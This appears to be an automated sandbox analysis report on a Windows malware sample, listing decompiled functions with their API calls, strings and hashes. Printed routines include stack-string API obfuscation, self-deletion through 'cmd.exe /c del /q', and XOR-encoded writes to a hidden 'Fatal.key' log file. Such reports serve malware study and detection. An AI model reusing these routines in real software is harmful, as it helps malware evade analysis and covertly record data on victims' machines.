API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 824ce54658dffb8fd7beb7f4081eeacb5446ed0dd36a4f0e682fb0970251a4da
Instruction ID: 345cb28879e9a89f549b81aa8f1c1e5f89832d8c5dd44fd8d30fdebd39e75dd9
Opcode Fuzzy Hash: 824ce54658dffb8fd7beb7f4081eeacb5446ed0dd36a4f0e682fb0970251a4da
Instruction Fuzzy Hash: 89815EB5D002299ECB10DFA5EC45AFEBBB5EF58304F10452BE454F3280DB789A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402EB0, Relevance: 43.8, APIs: 4, Strings: 21, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00402EB0(void* __esi, void* __ebp) {
				signed int _v4;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				signed int _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				signed int _t46;
				_Unknown_base(*)()* _t56;
				void* _t57;

				_t69 =  &_v52;
				_t46 =  *0x44f5d0; // 0x8e7de579
				_v4 = _t46 ^  &_v52;
				_v47 = 0x45;
				_v44 = 0x45;
				_v38 = 0x6c;
				_v37 = 0x6c;
				_v48 = 0x4b;
				_v46 = 0x52;
				_v45 = 0x4e;
				_v43 = 0x4c;
				_v42 = 0x33;
				_v41 = 0x32;
				_v40 = 0x2e;
				_v39 = 0x64;
				_v36 = 0;
				_v32 = 0x48;
				_v31 = 0x65;
				_v30 = 0x61;
				_v29 = 0x70;
				_v28 = 0x46;
				_v27 = 0x72;
				_v26 = 0x65;
				_v25 = 0x65;
				_v24 = 0;
				_v52 = GetProcAddress(LoadLibraryA( &_v48),  &_v32);
				_t27 =  &_v20; // 0x46
				_v12 = 0x73;
				_v11 = 0x73;
				_v20 = 0x47;
				_v19 = 0x65;
				_v18 = 0x74;
				_v17 = 0x50;
				_v16 = 0x72;
				_v15 = 0x6f;
				_v14 = 0x63;
				_v13 = 0x65;
				_v10 = 0x48;
				_v9 = 0x65;
				_v8 = 0x61;
				_v7 = 0x70;
				_v6 = 0;
				_t56 = GetProcAddress(LoadLibraryA( &_v48), _t27);
				_t57 =  *_t56(0, __esi);
				return E0042569C(_v52(), 0x65, _v16 ^ _t69, _t27, LoadLibraryA, __esi, _t57);
			}

APIs

LoadLibraryA.KERNEL32 ref: 00402F3E
GetProcAddress.KERNEL32(00000000), ref: 00402F47
LoadLibraryA.KERNEL32 ref: 00402F9F
GetProcAddress.KERNEL32(00000000), ref: 00402FA2

Strings

K, xrefs: 00402EE7
P, xrefs: 00402F6F
a, xrefs: 00402F1D
., xrefs: 00402F05
p, xrefs: 00402F95
r, xrefs: 00402F74
H, xrefs: 00402F14
t, xrefs: 00402F6A
R, xrefs: 00402EEC
G, xrefs: 00402F61
c, xrefs: 00402F7E
2, xrefs: 00402F00
L, xrefs: 00402EF6
Fpa, xrefs: 00402F4F, 00402F5B
a, xrefs: 00402F90
p, xrefs: 00402F22
H, xrefs: 00402F87
o, xrefs: 00402F79
3, xrefs: 00402EFB
d, xrefs: 00402F0A
N, xrefs: 00402EF1

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .$2$3$Fpa$G$H$H$K$L$N$P$R$a$a$c$d$o$p$p$r$t
API String ID: 2574300362-2358145951
Opcode ID: b405a1746627ac02572b913743df9bb6ca2bdf9548ae531ec859788368ecdcde
Instruction ID: 3fb7527b1e06e880936019b9228e3e6c64c89df365c9f9088a436a381c8058f4
Opcode Fuzzy Hash: b405a1746627ac02572b913743df9bb6ca2bdf9548ae531ec859788368ecdcde
Instruction Fuzzy Hash: 8F31E26100D3C0D9D342DB28948874FBFD51BA6208F88598EF5C85B292C6AA8618C77B

Uniqueness

Uniqueness Score: -1.00%

Function 004241F9, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004241F9(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x00424206
0x0042420f
0x00424218
0x00424222
0x0042422c
0x00424236
0x00424240
0x0042424a
0x00424254
0x0042425e
0x00424268
0x00424272
0x00424277
0x0042427e

APIs

RegisterClipboardFormatA.USER32 ref: 00424208
RegisterClipboardFormatA.USER32 ref: 00424211
RegisterClipboardFormatA.USER32 ref: 0042421B
RegisterClipboardFormatA.USER32 ref: 00424225
RegisterClipboardFormatA.USER32 ref: 0042422F
RegisterClipboardFormatA.USER32 ref: 00424239
RegisterClipboardFormatA.USER32 ref: 00424243
RegisterClipboardFormatA.USER32 ref: 0042424D
RegisterClipboardFormatA.USER32 ref: 00424257
RegisterClipboardFormatA.USER32 ref: 00424261
RegisterClipboardFormatA.USER32 ref: 0042426B
RegisterClipboardFormatA.USER32 ref: 00424275

Strings

Native, xrefs: 00424201
ObjectLink, xrefs: 00424213
RichEdit Text and Objects, xrefs: 0042426D
Object Descriptor, xrefs: 0042423B
Embed Source, xrefs: 00424227
OwnerLink, xrefs: 0042420A
Link Source Descriptor, xrefs: 00424245
FileNameW, xrefs: 00424259
Link Source, xrefs: 00424231
Rich Text Format, xrefs: 00424263
Embedded Object, xrefs: 0042421D
FileName, xrefs: 0042424F

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 6377991129f8093d2adcdbe6adaf4afff8ae5b24e7d46d9037476e7c742fec68
Instruction ID: 67b8a99e1fe810bfbdfd0d0b5ee00f2bbe8d356d173e21a4190a0642b51741f8
Opcode Fuzzy Hash: 6377991129f8093d2adcdbe6adaf4afff8ae5b24e7d46d9037476e7c742fec68
Instruction Fuzzy Hash: 53013970E807889ACA30BFB69C09D47BAE0FED9B107226D3FD49587550D6B8D449CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0042AB6D, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042AB6D(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x452e2c = GetProcAddress(_t38, "FlsAlloc");
					 *0x452e30 = GetProcAddress(_t38, "FlsGetValue");
					 *0x452e34 = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x452e2c;
					_t41 = TlsSetValue;
					 *0x452e38 = _t7;
					if( *0x452e2c == 0) {
						L6:
						 *0x452e30 = TlsGetValue;
						 *0x452e2c = E0042A88D;
						 *0x452e34 = _t41;
						 *0x452e38 = TlsFree;
					} else {
						__eflags =  *0x452e30;
						if( *0x452e30 == 0) {
							goto L6;
						} else {
							__eflags =  *0x452e34;
							if( *0x452e34 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x44f604 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x452e30);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E004275A0();
							 *0x452e2c = E0042A7BE( *0x452e2c);
							 *0x452e30 = E0042A7BE( *0x452e30);
							 *0x452e34 = E0042A7BE( *0x452e34);
							 *0x452e38 = E0042A7BE( *0x452e38);
							_t18 = E0042E0A7();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0042A8C0(_t37);
								goto L15;
							} else {
								_push(E0042AA4C);
								_t21 =  *((intOrPtr*)(E0042A82A( *0x452e2c)))();
								__eflags = _t21 - 0xffffffff;
								 *0x44f600 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E0042AD31(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x44f600);
										__eflags =  *((intOrPtr*)(E0042A82A( *0x452e34)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E0042A8FD(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0042A8C0(_t37);
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00426D11), ref: 0042AB73
__mtterm.LIBCMT ref: 0042AB7F

Part of subcall function 0042A8C0: __decode_pointer.LIBCMT ref: 0042A8D1
Part of subcall function 0042A8C0: TlsFree.KERNEL32(00000020,0042ACEC), ref: 0042A8EB
Part of subcall function 0042A8C0: DeleteCriticalSection.KERNEL32(00000000,00000000,74B065A0,00000001,0042ACEC), ref: 0042E10B
Part of subcall function 0042A8C0: DeleteCriticalSection.KERNEL32(00000020,74B065A0,00000001,0042ACEC), ref: 0042E135

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042AB95
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042ABA2
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042ABAF
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042ABBC
TlsAlloc.KERNEL32 ref: 0042AC0C
TlsSetValue.KERNEL32(00000000), ref: 0042AC27
__init_pointers.LIBCMT ref: 0042AC31
__encode_pointer.LIBCMT ref: 0042AC3C
__encode_pointer.LIBCMT ref: 0042AC4C
__encode_pointer.LIBCMT ref: 0042AC5C
__encode_pointer.LIBCMT ref: 0042AC6C
__decode_pointer.LIBCMT ref: 0042AC8D
__calloc_crt.LIBCMT ref: 0042ACA6
__decode_pointer.LIBCMT ref: 0042ACC0
GetCurrentThreadId.KERNEL32 ref: 0042ACD6

Strings

FlsSetValue, xrefs: 0042ABA4
KERNEL32.DLL, xrefs: 0042AB6E
FlsAlloc, xrefs: 0042AB8F
FlsGetValue, xrefs: 0042AB97
FlsFree, xrefs: 0042ABB1

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4287529916-3819984048
Opcode ID: 05da0a8c19ed1927a7696fe99030020eda98787123f0488b40cf92b6eb55b266
Instruction ID: f8adf248822a4fa8400cdc0d9e44f9e243b94c7c38f125758e6856da05e2758b
Opcode Fuzzy Hash: 05da0a8c19ed1927a7696fe99030020eda98787123f0488b40cf92b6eb55b266
Instruction Fuzzy Hash: 56317331A013209BDB11BF76FF0661B3BA1AB16366B50053BED04922A2DBF9D420CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 10004AFD, Relevance: 40.3, APIs: 20, Strings: 3, Instructions: 94
threadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E10004AFD() {
				void* _t38;
				void* _t45;
				void* _t46;
				void* _t51;
				signed int _t53;
				void* _t62;
				void* _t65;

				E100158AC(E1001A1F8, _t65);
				SetPriorityClass(GetCurrentProcess(), 0x100);
				SetThreadPriority(GetCurrentThread(), 0xf);
				_t53 = 0x40;
				 *(_t65 - 0x120) = 0;
				memset(_t65 - 0x11f, 0, _t53 << 2);
				asm("stosw");
				asm("stosb");
				GetModuleFileNameA(0, _t65 - 0x120, 0x104);
				_t38 = OpenProcess(0x1f0fff, 0, GetCurrentProcessId());
				 *(_t65 - 0x1c) = 0x104;
				 *0x10027270(_t38, 0, _t65 - 0x120, _t65 - 0x1c, _t62, _t51);
				SetFileAttributesA(_t65 - 0x120, 0x80);
				SHChangeNotify(4, 1, _t65 - 0x120, 0);
				_push("\"");
				L10015818();
				 *((intOrPtr*)(_t65 - 4)) = 0;
				_push(_t65 - 0x120);
				_push(_t65 - 0x10);
				_t45 = _t65 - 0x18;
				_push(_t45);
				L10015830();
				 *((char*)(_t65 - 4)) = 1;
				_push(_t65 - 0x10);
				_push(_t45);
				_t46 = _t65 - 0x14;
				_push(_t46);
				L1001582A();
				_push(_t46);
				 *((char*)(_t65 - 4)) = 2;
				L10015824();
				 *((char*)(_t65 - 4)) = 1;
				L1001580C();
				 *((char*)(_t65 - 4)) = 0;
				L1001580C();
				wsprintfA(_t65 - 0x230, "/c del /q %s",  *((intOrPtr*)(_t65 - 0x10)));
				ShellExecuteA(0, "open", "cmd.exe", _t65 - 0x230, 0, 0);
				ExitProcess(0);
			}

0x10004b02
0x10004b1b
0x10004b2a
0x10004b34
0x10004b3d
0x10004b43
0x10004b45
0x10004b47
0x10004b55
0x10004b68
0x10004b71
0x10004b82
0x10004b94
0x10004ba6
0x10004bac
0x10004bb4
0x10004bbf
0x10004bc2
0x10004bc6
0x10004bc7
0x10004bca
0x10004bcb
0x10004bd3
0x10004bd7
0x10004bd8
0x10004bd9
0x10004bdc
0x10004bdd
0x10004be2
0x10004be6
0x10004bea
0x10004bf2
0x10004bf6
0x10004bfe
0x10004c01
0x10004c15
0x10004c32
0x10004c39

APIs

__EH_prolog.LIBCMT ref: 10004B02
GetCurrentProcess.KERNEL32(00000100,?,75D6F420), ref: 10004B14
SetPriorityClass.KERNEL32(00000000), ref: 10004B1B
GetCurrentThread.KERNEL32 ref: 10004B23
SetThreadPriority.KERNEL32(00000000), ref: 10004B2A
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10004B55
GetCurrentProcessId.KERNEL32 ref: 10004B5B
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10004B68
QueryFullProcessImageNameA.KERNEL32(00000000,00000000,?,?), ref: 10004B82
SetFileAttributesA.KERNEL32(?,00000080), ref: 10004B94
SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 10004BA6
#537.MFC42(10024018), ref: 10004BB4
#924.MFC42(?,?,?,10024018), ref: 10004BCB
#922.MFC42(?,00000000,?,?,?,?,10024018), ref: 10004BDD
#858.MFC42(00000000,?,00000000,?,?,?,?,10024018), ref: 10004BEA
#800.MFC42(00000000,?,00000000,?,?,?,?,10024018), ref: 10004BF6
#800.MFC42(00000000,?,00000000,?,?,?,?,10024018), ref: 10004C01
wsprintfA.USER32 ref: 10004C15
ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 10004C32
ExitProcess.KERNEL32 ref: 10004C39

Strings

/c del /q %s, xrefs: 10004C0F
open, xrefs: 10004C2C
cmd.exe, xrefs: 10004C27

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$Current$#800FileNamePriorityThread$#537#858#922#924AttributesChangeClassExecuteExitFullH_prologImageModuleNotifyOpenQueryShellwsprintf
String ID: /c del /q %s$cmd.exe$open
API String ID: 2169315211-3932901086
Opcode ID: f98cdaea0dfbc8071d9d951eb9c89bd22ceb58115424f5df2f0f32367b8ba940
Instruction ID: 5f5dd1cb02d3db07e7af1dffb2c7d3c9f3d57631025ffa47b0e5b67928a6696e
Opcode Fuzzy Hash: f98cdaea0dfbc8071d9d951eb9c89bd22ceb58115424f5df2f0f32367b8ba940
Instruction Fuzzy Hash: 9E311AB1800259EFEB11DBE0CC89EEEBB7CFB08305F140559F605A6191DB749A89CB71

Uniqueness

Uniqueness Score: -1.00%

Function 10004029, Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 102
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10004029(CHAR* _a4) {
				void* _v8;
				long _v12;
				char _v272;
				void* _t33;
				void* _t35;
				int _t39;
				void* _t45;
				void* _t49;
				void* _t52;

				 *0x100273bc(0,  &_v272, 0x1c, 0);
				if(PathFileExistsA( &_v272) == 0) {
					PathStripToRootA( &_v272);
					strcat( &_v272, "Windows\\");
					strcat( &_v272, "Fatal");
					_push(".key");
				} else {
					strcat( &_v272, 0x10023ee0);
					strcat( &_v272, "Fatal");
					_push(".key");
				}
				strcat( &_v272, ??);
				_t33 = CreateFileA( &_v272, 0x40000000, 2, 0, 4, 0x80, 0);
				_v8 = _t33;
				_v12 = 0;
				if(GetFileSize(_t33, 0) < 0x3200000) {
					SetFilePointer(_v8, 0, 0, 2);
				}
				_t35 = lstrlenA(_a4);
				_t45 = _t35;
				_push(_t45);
				L10015806();
				_t52 = _t35;
				if(_t45 > 0) {
					_t49 = _a4 - _t52;
					do {
						 *_t35 =  *(_t49 + _t35) ^ 0x00000062;
						_t35 = _t35 + 1;
						_t45 = _t45 - 1;
					} while (_t45 != 0);
				}
				WriteFile(_v8, _t52, lstrlenA(_a4),  &_v12, 0);
				_t39 = CloseHandle(_v8);
				_push(_t52);
				L10015800();
				return _t39;
			}

0x10004042
0x10004057
0x10004089
0x1000409b
0x100040ac
0x100040b1
0x10004059
0x10004065
0x10004076
0x1000407b
0x1000407b
0x100040bd
0x100040dc
0x100040e4
0x100040e7
0x100040f5
0x100040fe
0x100040fe
0x1000410d
0x1000410f
0x10004111
0x10004112
0x1000411a
0x1000411c
0x10004121
0x10004123
0x10004129
0x1000412b
0x1000412c
0x1000412c
0x10004123
0x1000413f
0x10004148
0x1000414e
0x1000414f
0x10004159

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?,00000258), ref: 10004042
PathFileExistsA.SHLWAPI(?), ref: 1000404F
strcat.MSVCRT(?,10023EE0), ref: 10004065
strcat.MSVCRT(?,Fatal,?,10023EE0), ref: 10004076
PathStripToRootA.SHLWAPI(?), ref: 10004089
strcat.MSVCRT(?,Windows\), ref: 1000409B
strcat.MSVCRT(?,Fatal,?,Windows\), ref: 100040AC
strcat.MSVCRT(?,.key,?,Fatal,?,Windows\), ref: 100040BD
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100040DC
GetFileSize.KERNEL32(00000000,00000000), ref: 100040EA
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 100040FE
lstrlenA.KERNEL32(10004412), ref: 1000410D
#823.MFC42(00000000), ref: 10004112
lstrlenA.KERNEL32(10004412,10004412,00000000), ref: 10004138
WriteFile.KERNEL32(?,00000000,00000000), ref: 1000413F
CloseHandle.KERNEL32(?), ref: 10004148
#825.MFC42(00000000), ref: 1000414F

Strings

Fatal, xrefs: 10004070, 100040A6
Windows\, xrefs: 10004095
.key, xrefs: 100040B1
.key, xrefs: 1000407B

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Filestrcat$Path$lstrlen$#823#825CloseCreateExistsFolderHandlePointerRootSizeSpecialStripWrite
String ID: .key$.key$Fatal$Windows\
API String ID: 3367202764-763963170
Opcode ID: 2453f8a691e0ef1b0b3e3573bf1af6a923bfd1e4afe2ad4f49f94e3b10ce99ee
Instruction ID: 049254a9a432ab66cda4c751fd44d8d4f2a5607dcaec139970dbd9873612bb59
Opcode Fuzzy Hash: 2453f8a691e0ef1b0b3e3573bf1af6a923bfd1e4afe2ad4f49f94e3b10ce99ee
Instruction Fuzzy Hash: BD319075800228BAEB20EBA1CC8AFDF7F6CEF15354F518191F644E6051DB719A858FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D28E, Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 183
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E1000D28E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, CHAR* _a20, intOrPtr _a24, int _a28, intOrPtr _a32) {
				int _v8;
				intOrPtr _v20;
				_Unknown_base(*)()* _v32;
				int _v36;
				signed int _v40;
				char* _v52;
				_Unknown_base(*)()* _v56;
				void _v316;
				_Unknown_base(*)()* _v320;
				void _v352;
				struct HINSTANCE__* _v356;
				char _v360;
				void _v624;
				char _v628;
				void* __ebp;
				struct HINSTANCE__* _t75;
				CHAR* _t90;
				int _t97;
				char* _t110;
				char _t116;
				char* _t123;
				intOrPtr _t124;
				void* _t126;

				_push(0xffffffff);
				_push(0x1001b488);
				_push(0x10015a2a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_v40 = 0;
				memset( &_v352, 0, 0x20);
				memset( &_v316, 0, 0x104);
				memset( &_v624, 0, 0x104);
				_t126 = _t124 - 0x260 + 0x24;
				_t75 = LoadLibraryA("ADVAPI32.dll");
				_v356 = _t75;
				_v32 = GetProcAddress(_t75, "RegQueryValueExA");
				_v56 = GetProcAddress(_v356, "RegOpenKeyExA");
				GetProcAddress(_v356, "RegEnumValueA");
				GetProcAddress(_v356, "RegEnumKeyExA");
				_v320 = GetProcAddress(_v356, "RegCloseKey");
				_v8 = 0;
				_push( &_v628);
				_push(0x20019);
				_push(0);
				_push(_a8);
				_push(_a4);
				if(_v56() == 0) {
					if(_a32 == 0) {
						_t116 = _a16;
						if(_t116 > 0) {
							if(_t116 <= 2) {
								_v36 = 0x104;
								_push( &_v36);
								_push( &_v316);
								_push( &_a16);
								_push(0);
								_push(_a12);
								_push(_v628);
								if(_v32() == 0) {
									_t90 =  &_v316;
									goto L20;
								}
							} else {
								if(_t116 == 3) {
									_v36 = _a28;
									_push( &_v36);
									_push(_a24);
									_push( &_a16);
									_push(0);
									_push(_a12);
									_push(_v628);
									if(_v32() == 0) {
										_push(_a16);
										_push("%08X");
										goto L17;
									}
								} else {
									_t97 = 4;
									if(_t116 == _t97) {
										_v36 = _t97;
										_push( &_v36);
										_push( &_v360);
										_push( &_a16);
										_push(0);
										_push(_a12);
										_push(_v628);
										if(_v32() == 0) {
											_push(_v360);
											_push("%d");
											L17:
											wsprintfA(_a20, ??);
											goto L21;
										}
									} else {
										if(_t116 == 7) {
											_v36 = 0x104;
											_push( &_v36);
											_push( &_v316);
											_push( &_a16);
											_push(0);
											_push(_a12);
											_push(_v628);
											if(_v32() == 0) {
												_t123 =  &_v316;
												while(1) {
													_v52 = _t123;
													if( *_t123 == 0) {
														break;
													}
													E1000D254( &_v624, _t123, 0x104);
													E1000D254( &_v624, " ", 0x104);
													_t110 = strchr(_t123, 0);
													_t126 = _t126 + 0x20;
													_t123 =  &(_t110[1]);
												}
												_t90 =  &_v624;
												L20:
												lstrcpyA(_a20, _t90);
												L21:
												_v40 = 1;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_v40 = _v40 | 0xffffffff;
				}
				_v8 = _v8 | 0xffffffff;
				E1000D4EC();
				if(_v356 != 0) {
					FreeLibrary(_v356);
				}
				 *[fs:0x0] = _v20;
				return _v40;
			}

0x1000d291
0x1000d293
0x1000d298
0x1000d2a3
0x1000d2a4
0x1000d2b6
0x1000d2c3
0x1000d2d7
0x1000d2e6
0x1000d2ec
0x1000d2f4
0x1000d2fa
0x1000d30e
0x1000d31e
0x1000d32c
0x1000d339
0x1000d348
0x1000d34e
0x1000d357
0x1000d358
0x1000d35d
0x1000d35e
0x1000d361
0x1000d369
0x1000d377
0x1000d37d
0x1000d382
0x1000d38b
0x1000d481
0x1000d487
0x1000d48e
0x1000d492
0x1000d493
0x1000d494
0x1000d497
0x1000d4a2
0x1000d4a4
0x00000000
0x1000d4a4
0x1000d391
0x1000d394
0x1000d44c
0x1000d452
0x1000d453
0x1000d459
0x1000d45a
0x1000d45b
0x1000d45e
0x1000d469
0x1000d46b
0x1000d46e
0x00000000
0x1000d46e
0x1000d39a
0x1000d39c
0x1000d39f
0x1000d419
0x1000d41f
0x1000d426
0x1000d42a
0x1000d42b
0x1000d42c
0x1000d42f
0x1000d43a
0x1000d43c
0x1000d442
0x1000d473
0x1000d476
0x00000000
0x1000d47c
0x1000d3a1
0x1000d3a4
0x1000d3aa
0x1000d3b0
0x1000d3b7
0x1000d3bb
0x1000d3bc
0x1000d3bd
0x1000d3c0
0x1000d3cb
0x1000d3d1
0x1000d3d7
0x1000d3d7
0x1000d3dc
0x00000000
0x00000000
0x1000d3e7
0x1000d3f9
0x1000d400
0x1000d406
0x1000d40a
0x1000d40a
0x1000d40e
0x1000d4aa
0x1000d4ae
0x1000d4b4
0x1000d4b4
0x1000d4b4
0x1000d3cb
0x1000d3a4
0x1000d39f
0x1000d394
0x1000d38b
0x1000d382
0x1000d36b
0x1000d36b
0x1000d36b
0x1000d4bb
0x1000d4bf
0x1000d4ca
0x1000d4d2
0x1000d4d2
0x1000d4de
0x1000d4e9

APIs

memset.MSVCRT ref: 1000D2C3
memset.MSVCRT ref: 1000D2D7
memset.MSVCRT ref: 1000D2E6
LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D2F4
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000D30C
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000D31C
GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000D32C
GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000D339
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000D346
strchr.MSVCRT ref: 1000D400
lstrcpyA.KERNEL32(?,?), ref: 1000D4AE
